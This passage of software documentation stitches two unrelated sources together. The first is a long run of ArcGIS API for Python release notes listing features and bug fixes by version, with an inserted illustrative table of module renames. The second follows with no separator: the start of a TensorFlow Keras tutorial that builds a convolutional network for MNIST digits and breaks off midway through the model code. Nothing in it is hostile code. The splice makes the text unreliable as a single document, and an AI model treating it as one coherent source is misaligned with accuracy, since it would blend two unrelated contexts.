* Fixed issue where [`Item.comments`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.comments) and [`Item.add_comment()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.add_comment) returned invalid URL
* Added [`LicenseManager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#license-manager) documentation to the [`arcgis.gis.admin`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html) module
* Fixed issue with [`clone_items()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.clone_items) function failing to update paths for Tiled Map Service Layers
* Added [`create_thumbnail()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.create-thumbnail) function to `Item` class
* Fixed issue where [`arcgis.server.Server()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.server.html#server) did not read the `verify_cert` parameter
* Fixed [`FeatureLayerCollectionManager.overwrite()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.FeatureLayerCollectionManager.overwrite) method to work with Portal items
* **Available at ArcGIS Enterprise 10.7:** Added [`arcgis.geoanalytics.manage_data.clip_layer()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.manage_data.html#calculate-fields) functionality
# What's new in version 1.4.2
#### New
* Added a `storymap` submodule to the [`arcgis.apps`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.apps.html) module to work with [ArcGIS StoryMaps](https://storymaps.arcgis.com/en/app-list/map-journal/)
* Added support for [registering data](http://enterprise.arcgis.com/en/server/latest/publish-services/windows/overview-register-data-with-arcgis-server.htm) and adding [`big data files shares`](http://enterprise.arcgis.com/en/server/latest/get-started/windows/what-is-a-big-data-file-share.htm) from Cloud Stores
* Added `bulk_update()` function to `ContentManager` to update properties on a collection of items
* Added a new [Orthomapping](http://pro.arcgis.com/en/pro-app/help/data/imagery/introduction-to-ortho-mapping.htm) module
* Enhanced [`clone()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.clone_items) of [`feature layer views`](https://doc.arcgis.com/en/arcgis-online/manage-data/create-hosted-views.htm) to support varied rendering and template definitions
* Improved `clone()` of Pro Maps and Survey123 Forms
* Added support for `clone()` of [Vector Tile Style Items](https://www.esri.com/arcgis-blog/products/developers/mapping/design-custom-basemaps-with-the-new-arcgis-vector-tile-style-editor/)
* Improved performance when using `clone()` on `feature services`
* Added `default_aggregation_styles` environment setting to [`gis.env`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.env.html)
* Improved handling of date fields with the [`Spatial DataFrame`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
#### Fixes
* Fixed BUG-000110440 where the misspelled `suppress_email` parameter caused `gis.admin.license.revoke()` to fail
* Fixed BUG-000110659 by adding the missing `text` parameter to the `item.update()` `item_properties` dictionary
* Fixed error when writing `geojson` files to `shapefiles` using the [`SpatialDataFrame`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
* Fixed erroneous documentation stating that [`overwrite`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.FeatureLayerCollectionManager.overwrite) preserves symbology
* Fixed issue with `SpatialDataFrame` where null geometries were not converted to empty geometries in Shapefiles and Geodatabase feature classes
* Fixed issue where [`plot()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#arcgis.features.SpatialDataFrame.plot) method failed with certain number of features
* Fixed issue where [`GIS`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#gis) `profile` parameter would not create new profile in clean environment
* Fixed bug when importing [`arcgis.geoenrichment`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoenrichment.html)
# What's new in version 1.4.1
#### New
* Simplified `time_filter` parameter for a [`query()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html?highlight=time_filter#arcgis.features.Table.query) to accept Python [`datetime`](https://docs.python.org/3/library/datetime.html) module `date`, `time`, or _timestamp_ objects
* Added support for [`append_data()`](https://developers.arcgis.com/rest/services-reference/append-data.htm) tool to the [`arcgis.geoanalytics.manage_data`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.manage_data.html) submodule
* Added support for [`overlay_layers`](https://developers.arcgis.com/rest/services-reference/overlay-layers.htm) to [`arcgis.geoanalytics.manage_data`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.manage_data.html) submodule
* Added support for a new `build_multivariable_grid` tool in the [`arcgis.geoanalytics.summarize_data`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html) submodule
* Added documentation for layer filtering options when using [`arcgis.geoanalytics`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.toc.html) functions
* Added ability to [`Replace Service`](https://developers.arcgis.com/rest/users-groups-and-items/replace-service.htm) on the [`ContentManager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#contentmanager)
* Added ability to protect a [`group`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Group) from being deleted
* Added support for `Personal Information Exchange` files (.pfx) as the value for the `cert_file` parameter of the [`GIS`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#gis) class for PKI implementations
* Improved error messaging with invalid credentials and valid `cert_file` logins
* Added module to support [`Workforce for ArcGIS`](https://workforce.arcgis.com/)
* Added query and download_all functionality to [`Attachment Manager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.AttachmentManager)
* Added documentation on the [`update_properties()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.GIS.update_properties) function
* Added `shared_with` property to [`Item`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#item) class to determine how an item has been [shared](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#item)
* Updated the [`datastore.validate()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.Datastore.validate) function
* Improved performance on [`clone_items()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.ContentManager.clone_items) when querying attachments
* Added `content_discovery` property to [`System`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html#system) resource for enabling/disabling external discovery of portal content
* Added a `copy()` function to the [`Item`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#item) class to derive a new item based on current item
* Updated output from the [`get_samples()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.get_samples) function
* Added documentation for geoprocessing tools to [`arcgis.features.analysis`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.analysis.html#module-arcgis.features.analysis) module
* Updated [`UserManager.search()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.UserManager.search) function when specifying roles
* Added `OfflineMapAreaManager` object to the [`arcgis.mapping`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html) module to support managing [`offline_areas`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#arcgis.mapping.WebMap.offline_areas)
* Added ability to add items from cloud content storage using the `dataUrl` and `filename` parameters on the [`ContentManager.add()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.add) function
#### Fixes
* Fixed issue where [`group.update()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Group.update) did not properly update the group
* Fixed issue in [`clone_items`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.clone_items) function where Web App Builder Applications were not cloning correctly
* Removed errant warnings from [`group.reassign_to()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Group.reassign_to) function
* Fixed issue where `geometry` objects were preventing discovery of duplicate records
* Fixed issue on [`Attachment Manager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.AttachmentManager) for attachments over 9MB
* Fixed issue on [`Attachment Manager`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.AttachmentManager) where input was ignored if a `global id` was not used
* Fixed issue where a geometry filter crashed the [`SyncManager.create()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.SyncManager.create) method
* Fixed issue where the [`featurelayer.query()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#arcgis.features.FeatureLayer.query) method constructed a faulty request when using the `return_distinct_values` parameter
* Fixed issue where [`convex_hull()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geometry.html#convex-hull) returned incorrect geometry
* Fixed issue where [`update_item()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.update) failed if text exceeded 32767 characters
* Fixed issue that prevented publishing [`scene layer package`](http://pro.arcgis.com/en/pro-app/help/sharing/overview/scene-layer-package.htm) items with [`gis.item.publish()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.Item.publish)
* Fixed error in [`clone_items()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=update_properties#arcgis.gis.ContentManager.clone_items) function handling of [`MapService`](http://enterprise.arcgis.com/en/server/latest/publish-services/linux/what-is-a-map-service.htm) paths
* Fixed error when using `pip` to install `arcgis` on Windows machines without Anaconda
* Fixed intermittent problem when storing multiple users on the same portal in a [`profile`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GIS) file
* Fixed issue with incorrect `role` information returned by [`UserManager.search()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.UserManager.search)
* Fixed issue with [`WebMap.remove_layers()`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#arcgis.widgets.MapView.remove_layers) to handle duplicate layers
# What's new in version 1.4
#### New
* Added full capabilities to install ```arcgis``` package with [```pip```](https://pip.pypa.io/en/stable/)
* Added ```Upload Manager``` to aid in [upload](https://developers.arcgis.com/rest/services-reference/upload.htm) operations to the server
* Added [```shapely```](https://toblerity.org/shapely/manual.html) support to the [```Spatial DataFrame```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
* Added ```is_empty``` property for checking ```geometry```
* Added support for [```GeoJSON```](http://geojson.org/) [```LineStrings```](https://tools.ietf.org/html/rfc7946#section-3.1.4), and [```Polygons```](https://tools.ietf.org/html/rfc7946#section-3.1.6)
* Added support for [```Operations Views```](https://doc.arcgis.com/en/operations-dashboard/operation-views/) and [```Dashboards```](https://docs.arcgis.com/en/operations-dashboard/help/what-is-a-dashboard.htm) to the ```clone_items``` function on ```Content Manager```
* Added ability to ```Content Manager``` to [```search```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.ContentManager.search) for [```map image layers```](http://pro.arcgis.com/en/pro-app/help/sharing/overview/map-image-layer.htm)
* Enhanced [```Map Image Layer.export()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#arcgis.mapping.MapImageLayer.export_map) to output image and kmz formats
* Added ability to export data from non-hosted ```feature layer``` to Excel
* Added support for multiple profiles persisted in the [```.arcgisprofile```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#gis) file
* Added ability to plot a [```GeoSeries```](http://geopandas.org/data_structures.html) (see [```Spatial DataFrame```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.html?highlight=geoseries#arcgis-features-spatialdataframe)) with a suite of symbology and rendering options
* Added [```admin```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.admin.html) functionality for Portal users with [```publisher```](https://enterprise.arcgis.com/en/portal/latest/administer/linux/roles.htm) privileges
* Added ```output_cellsize``` parameter to [```resample```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#resample) raster function
* Added ability to read list of ```Feature Layers``` to [```FeatureLayerCollectionManager.create_view```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.managers.html#arcgis.features.managers.FeatureLayerCollectionManager.create_view) method
* Added ability to register SDE Connection Files as a data store
* Improved performance when ```cloning``` items
* Added parameters to ```user.update()``` method to accept first and last names as input
* Added ```distanceSplit``` and ```distanceSplitUnit``` parameters to [```GeoAnalytics.reconstruct_tracks```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#reconstruct-tracks) function
* Added ```cellSize```, ```cellSizeUnits```, and ```shapeType``` parameters to [```features.analyze_patterns.find_hot_spot```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.analyze_patterns.html#find-hot-spots) function
* Added support for Content Categories for portal items
* Added ability to convert Rasters to Features with [```ImageryLayer.to_features()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.toc.html#arcgis.raster.ImageryLayer.to_features) function
* Added ```draw_graph``` function to ```ImageryLayer``` objects for visualizing Raster function workflows
* Added support for additional rasters as inputs to [```raster functions```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html)
* Added additional rendering support to [```MapView```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#mapview) and [```FeatureLayer```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#featurelayer) objects
* Added ```users_update_items``` parameter to [```GroupManager.create()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GroupManager.create) to allow members to update all items in group
* Added ```token``` parameter to [```GIS```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GIS) for logging into GIS from external contexts
* Enhanced automation of creating users with ```security_question``` parameter to ```user.update()``` method
* Added support for [```MapImageLayer```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#arcgis.mapping.MapImageLayer) to [```map.add_layer()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.widgets.html#arcgis.widgets.MapView.add_layer) method
#### Fixes
* ```Group.add_user``` method will accept ```user``` objects or a ```string``` representing username as input.
* Updated date handling and integer types available on the ```Spatial DataFrame```
* Fixed issue where mixed-content layers were failing when using the [```map widget```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#arcgis.gis.GIS.map)
* Fixed issue where ```FeatureSet.df``` was not properly setting the spatial reference
* Detailed warnings are now issued when exporting a layer with a [```global function```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.gbl.html) in the function chain
* Fixed issue where PNG files referenced in thumbnail parameter on ```user.update()``` method raised an exception
* Fixed error when drawing [```FeatureCollections```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#featurecollection) with ```datetime``` fields
* Fixed bug where ```ContentManager.import_data()``` returned error if Pandas dataframe did not contain addresses
* Fixed bug when using ```SpatialDataFrame.to_featurelayer()``` method for environments lacking ```ArcPy``` site-package
* Fixed issue where [```time-enabled hosted feature layers```](http://desktop.arcgis.com/en/arcmap/10.5/map/time/serving-time-aware-layers.htm) failed to clone to portal items
* Fixed projection issue when using ```SpatialDataFrame.to_featureclass()``` method when ```ArcPy``` site-package not present
* Fixed problem with [```Geoenrichment.Country.subgeographies```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoenrichment.html#arcgis.geoenrichment.Country.subgeographies) queries not returning results
* Fixed handling of ```NoneType``` responses for Geoprocessing service requests
* Fixed bug where [```user.update_level()```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html?highlight=user%20update_level#arcgis.gis.User.update_level) method was not changing level of user
* Added missing parameters to [```raster.classify```](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.raster.functions.html#classify) function
* Fixed errors when writing dates to feature attributes
# What's new in version 1.3
#### New
- Added support to render and work with Vector Tile Layers in `arcgis.mapping` module with a new `VectorTileLayer` class.
- Added ability to add text and archives as resource files to Items.
- Added a `find_outliers` task to the `arcgis.features.analysis` module to locate features and clusters that differ significantly from the rest of the data
- Added support for [Living Atlas](https://livingatlas.arcgis.com/en/#s=0) Content
- Added ability to select layers to add when creating new feature service from `FeatureLayerCollection` item
- Added `detect_track_incidents` tool to the `arcgis.geoanalytics.find_locations` module
- Added support for unfederated ArcGIS Server instances from the `arcgis.gis.server` module
- Added ability to cancel Geoprocessing jobs with keyboard
- Added ability to publish map services from Geoanalytics results for visualizing large spatiotemporal feature services
- Added ability to login with a [public account](https://www.arcgis.com/home/signin.html) to [ArcGIS Online](https://www.arcgis.com)
- Added support for Dynamic Map Image Layers
- Enhanced search capabilities to look for specific [categories](https://developers.arcgis.com/python/guide/understanding-geocoders/#categories-property)
- Added ability to create `Features` from and convert features to [geojson](http://geojson.org/)
- Improved spatial reference support when using [`arcgis.features.SpatialDataFrame`](https://esri.github.io/arcgis-python-api/apidoc/html/arcgis.features.toc.html#spatialdataframe)
- Improved function to export `SpatialDataFrame` by checking for required modules
- Improved performance when creating `Imagery Layers`
- Added new functions to `raster.functions` module. See [**here**](https://desktop.arcgis.com/en/arcmap/latest/manage-data/raster-and-images/what-are-the-functions-used-by-a-raster-or-mosaic-dataset.htm) for function details
- `complex` - computes magnitude from an input raster with complex pixel types
- `colormap_to_rgb` - converts a single-band raster with a colormap to three-band raster
- `statistics_histogram` - defines the statistics and histogram of a raster to help render output
    - `tasseled_cap` - analyzes certain multispectral datasets and calculates new bands useful to map vegetation and urban development changes
- `identity` - default function required in a [mosaic dataset](http://desktop.arcgis.com/en/arcmap/latest/manage-data/raster-and-images/what-is-a-mosaic-dataset.htm) if there is no other function
    - `colorspace_conversion` - converts the color model of a three-band unsigned 8-bit image from HSV to RGB, or vice versa
- `grayscale` - converts a multi-band image into a single-band grayscale image
- `pansharpen` - enhances spatial resolution of a multi-band image by fusing with higher-resolution panchromatic image
- `spectral_conversion` - applies a matrix to affect the spectral values output by a multi-band image
- `raster_calculator` - allows you to call all existing math functions for building expressions
- `speckle` - filters a speckled radar dataset to smooth out noise
- Added a new [`GeoEnrichment`](http://resources.arcgis.com/en/help/arcgis-rest-api/#/The_GeoEnrichment_service/02r30000021r000000/) module
- Added ability to set and configure the identity provider for managing user credentials
- Added support for passing geometry columns into [`PySal`](http://pysal.readthedocs.io/en/latest/users/introduction.html) functions
- Added a new `esri_access` property to [`User`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#user) objects so Esri training materials could be accessed
- Added support for feeding `SpatialDataFrame` objects to [`GeoProcessing`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoprocessing.html) tools
- A new `SpatialDataFrame.plot()` method to do bar, line and scatterplots
- Added support for multi-part [`Polygon`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geometry.html#polygon) geometries in `FeatureSet` objects
- Added support for creating [`Hosted Feature Layer Views`](https://doc.arcgis.com/en/arcgis-online/share-maps/create-hosted-views.htm)
- Added support for cloning items directly from the [`ContentManager`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#contentmanager)
- Added ability to directly [read, write and author Web Maps](/python/guide/working-with-web-maps-and-web-scenes/) from [`arcgis.mapping.WebMap`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.mapping.html#webmap) objects
- Added high-performance support for `geocoding` and `geoanalytics`
- Added `geocode_locations` tool in `arcgis.geoanalytics.find_locations` module
- Added functionality to the [`ReconstructTracks`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#reconstruct-tracks) and [`JoinFeatures`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.geoanalytics.summarize_data.html#join-features) tools in the `arcgis.geoanalytics.summarize_data` module
- Added support for setting content status on [`Item`](http://esri.github.io/arcgis-python-api/apidoc/html/arcgis.gis.toc.html#item) objects
#### Fixes
- BUG-00010973 Using the "services.list()" function fails with Traceback error
- BUG-000105897 When iterating over items from a non-existent folder, the Python API iterates over the ArcGIS Online root folder
- BUG-000105969 When creating replicas, a json data format replica was not being created in the output directory
- BUG-000109342 Error when importing premium toolboxes using `geoprocessing.import_toolbox` function
- Fixed `FeatureSet` issue so geometry type is set properly
- Fixed issue where new datastores were not being returned from the `servers.datastores.list()` method
- Fixed issue where querying a `FeatureLayer` with `returnIdsOnly` and `returnCountOnly` was not returning all records
- Fixed issue where publishing from service definition files was not placing service items in folders
- Fixed issue where no error was reported when creating a big data file share using an invalid path
- Fixed issue when using the defaults for the `arcgis.admin.System.reindex` function
- Fixed issue where `publish_sd()` function to publish from service definition files was not available
- Fixed issue where Python API tried to use ArcGIS Online basemaps in a disconnected environment
- Improved ability to save `Features` containing non-English data
- Fixed issue where creating a `SpatialDataFrame` from a feature class was not importing spatial reference correctly
- Improved security on anonymous connections to ArcGIS Online
- Fixed security issue so that NTLM and Kerberos authentication work with Python 3.6.1
- Improved performance for download of Python API
- Fixed issue where geometry extents were not properly returned which affected some projecting operations
- Fixed issue where fields over 255 characters in length were not properly created
- Fixed issue where updating the large thumbnail on an item did not update the image to the proper type
# What's new in version 1.2.4
A number of quality improvements were made in versions 1.2.3 and 1.2.4. Below is the list of bugs reported to Technical Support that were fixed:
- BUG-000108063 ArcGIS Python API is unable to connect to Portal for ArcGIS with Integrated Windows Authentication configured.
- BUG-000107899 In the ArcGIS Python API, cannot update the ArcGIS Online organization banner using the set_banner method when using a custom html string.
- Added support for using the API behind proxy servers
# What's new in version 1.2.2
Version 1.2.2 ensures the map widget in Jupyter notebooks continues to work with newer installs of the API.
# What's new in version 1.2.1
Version `1.2.1` is primarily a bug-fix and documentation update release. Below is a non-exhaustive list of fixes:
- Fix to ensure `DataStoreManager.list()` is updated when user adds, modifies or updates data stores.
- BUG-000104664 ArcGIS API for Python fails to return the groupProviderName value
- BUG-000105897 When iterating through items in a nonexistent folder using the ArcGIS Python API, items from the ArcGIS Online root folder are returned.
- BUG-000105969 In ArcGIS Python API, using `replicas.create()` and `data_format = 'json'` is not able to create output in local directory when out_path is defined.
- ENH-000106710 Automate the creation of Enterprise groups in ArcGIS Online and Portal using the ArcGIS API for Python.
- Support for Living Atlas on ArcGIS Enterprise
- Better error messages
- BUG-000105270 `returnAttachments` is an invalid parameter and is repeated multiple times in the `arcgis.features.managers` module reference page for the Python API
- Support for `find_outliers` tool
- Support to add Item resources as text, URL and archive
- Geocoding results can be returned as `FeatureSet` objects.
- Support for publishing hosted tile layers from feature layers
- Documentation was added for administering your GIS, administering your ArcGIS servers, building a distributed GIS, and customizing your GIS look and feel.
# What's new in version 1.2.0
Version 1.2 brings with it a slew of new capabilities. Below is a non-exhaustive list of enhancements:
- A new `arcgis.gis.admin` sub module -- expands your admin capabilities, manage credits, create gis collaborations to build a distributed GIS, modify the user experience of the portal website
- A new `arcgis.gis.server` sub module -- allows you to manage servers federated with your ArcGIS Enterprise
- A new `arcgis.raster.functions` sub module for raster functions -- express raster functions as Python functions, chain them together and perform raster algebra using regular Python arithmetic operators
- A new `SpatialDataFrame` class which extends your regular Pandas DataFrame with spatial capabilities and ability to work with local datasets
- Feature layer improvements -- overwrite feature layers, better support for attachments
- Map widget enhancements -- disable zoom when scrolling the notebook
- OAuth login using app id and secret
- A new GeoAnalytics tool to create space-time cubes
# What's new in version 1.0.1
Version 1.0.1 is a bug fix release. Following are some of the bugs that were resolved:
* BUG-000101507 gis.groups.search returns incorrect results if the User is an owner of more than 100 groups.
* Enabled building initial cache when publishing vector tile packages
* Fixed bug in creating new users on ArcGIS Online or Portal for ArcGIS 10.5 or newer
* Fix to ignore values like size of -1 when initializing item objects
* Reorder batch geocoding results to match input array
# What's new in version 1.0.0
Ever since we released the public beta versions, your response to this API has been phenomenal. Since the last release of beta 3, the API went through a redesign phase. We took a critical look at the previous design and evaluated it against ease of use, extensibility and our original goal of developing a Pythonic API for GIS. The result is this new design, a design that does not simply conform to the implementation logic, but efficiently abstracts it, ensuring the simplicity and beauty of the programming language prevails.
## API design changes
The following are some of the high-level changes you will notice in version 1.0 of the API. You might have to update your notebooks and scripts, and we apologize for this inconvenience.
* Various layer types in `arcgis.lyr` module are now in their own separate modules such as `arcgis.features`, `arcgis.raster`, `arcgis.network` etc.
* `arcgis.viz` is now `arcgis.mapping` with additional support for vector tiles, map image layers
* Tools in `arcgis.tools` are accessible as functions in the corresponding layer modules. This allows a better grouping and presentation of tools, making them available right alongside the layer types they process. For instance, the feature analysis tools available earlier as `arcgis.tools.FeatureAnalysisTools` are now `arcgis.features.analyze_patterns`, `arcgis.features.enrich_data` etc.
* Big data analysis tools available earlier as `arcgis.tools.BigData` are now in a separate module, `arcgis.geoanalytics`.
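The module moves listed above can be summarized as a lookup table. The module names below are taken verbatim from these notes; the table and the `new_locations` helper are illustrative only, not part of the arcgis API:

```python
# Beta-era module -> 1.0 module(s), per the design changes listed above.
MODULE_MOVES = {
    "arcgis.lyr": ("arcgis.features", "arcgis.raster", "arcgis.network"),
    "arcgis.viz": ("arcgis.mapping",),
    "arcgis.tools.FeatureAnalysisTools": (
        "arcgis.features.analyze_patterns",
        "arcgis.features.enrich_data",
    ),
    "arcgis.tools.BigData": ("arcgis.geoanalytics",),
}

def new_locations(old_module):
    """Return the 1.0 module(s) replacing a beta-era module, if listed."""
    return MODULE_MOVES.get(old_module, (old_module,))
```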
## Enhancements and new features
This is by no means an exhaustive list. Below are some major enhancements you may notice in version 1.0 of the API
* ability to work with replicas for feature layers
* ability to manage user roles
* support for multiple outputs in GP tools
* support for stream layers
* added more big data analysis tools in the `arcgis.geoanalytics` module
* extended support for web tools
* smart mapping improvements
* extended ability to publish package items such as vector tile, scene, tile
* enhanced support for login using ArcGIS Pro
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# Convolutional Neural Networks
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/images/cnn">
<img src="https://www.tensorflow.org/images/tf_logo_32px.png" />
    View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/ko/tutorials/images/cnn.ipynb">
<img src="https://www.tensorflow.org/images/colab_logo_32px.png" />
    Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/ko/tutorials/images/cnn.ipynb">
<img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />
    View source on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/ko/tutorials/images/cnn.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
Note: This document was translated by the TensorFlow community. Because community translations are best-effort, there is no guarantee that this is an exact and up-to-date reflection of the [official English documentation](https://www.tensorflow.org/?hl=en).
If you have suggestions to improve this translation, please send a pull request to the [tensorflow/docs-l10n](https://github.com/tensorflow/docs-l10n/) GitHub repository.
To volunteer to write or review translations, please email
[docs-ko@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ko).
This tutorial trains a simple [convolutional neural network](https://developers.google.com/machine-learning/glossary/#convolutional_neural_network) (CNN) to classify MNIST digits. This simple network will achieve 99% accuracy on the MNIST test set. Because this tutorial uses the [Keras Sequential API](https://www.tensorflow.org/guide/keras), creating and training the model takes just a few lines of code.
Note: You can speed up CNN training with a GPU. If you are running this notebook in Colab, select GPU under *Edit -> Notebook settings -> Hardware accelerator*.
### Import TensorFlow
```
!pip install tensorflow-gpu==2.0.0-rc1
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
```
### Download and prepare the MNIST dataset
```
(train_images, train_labels), (test_images, test_labels) = datasets.mnist.load_data()
train_images = train_images.reshape((60000, 28, 28, 1))
test_images = test_images.reshape((10000, 28, 28, 1))
# Normalize pixel values to be between 0 and 1
train_images, test_images = train_images / 255.0, test_images / 255.0
```
### Create the convolutional base
The six lines of code below define the convolutional base using a common pattern: a stack of [Conv2D](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Conv2D) and [MaxPooling2D](https://www.tensorflow.org/api_docs/python/tf/keras/layers/MaxPool2D) layers.
As input, a CNN takes tensors of shape (image height, image width, color channels), ignoring the batch size. MNIST has one color channel (because the images are grayscale), whereas a color image has three channels (R,G,B). In this example, we will define a CNN to process inputs of shape (28, 28, 1), the format of MNIST images. We do this by passing this value to the `input_shape` parameter of the first layer.
```
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
```
